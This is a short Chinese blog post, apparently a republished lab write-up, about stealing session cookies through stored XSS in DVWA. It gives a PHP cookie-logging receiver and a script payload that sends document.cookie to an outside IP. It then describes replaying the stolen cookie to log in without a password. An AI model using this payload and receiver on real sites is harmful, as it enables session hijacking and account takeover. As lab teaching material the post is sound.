存储型xss盗取cookie实验

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了存储型xss盗取cookie实验相关的知识,希望对你有一定的参考价值。

声明:仅供交流使用,严禁违法犯罪,否则后果自负

1,准备接收cookie的环境:

    

ip为172.24.10.105

代码为:保存为 getCookie.php

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "w");
fwrite($log, $cookie ."\n");
fclose($log);
echo "攻击成功";
?>


2,在实验环境插入js代码:

<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>


通过审查元素把限制取消,然后插入js代码

技术分享图片

技术分享图片

然后重新访问这个页面发现进行了跳转

技术分享图片

并在接收cookie的平台看到了cookie

技术分享图片



换一个浏览器设置cookie



技术分享图片



直接访问:

http://127.0.0.1/DVWA/

无需密码登录成功

技术分享图片






欢迎关注微信公众号

技术分享图片

以上是关于存储型xss盗取cookie实验的主要内容,如果未能解决你的问题,请参考以下文章

XSS攻击

信安小白,一篇博文讲明白存储型反射型XSS漏洞

xss(跨站脚本攻击)

xss(跨站脚本攻击)

安全牛学习笔记XSS的简述

Pikachu-XSS模块与3个案例演示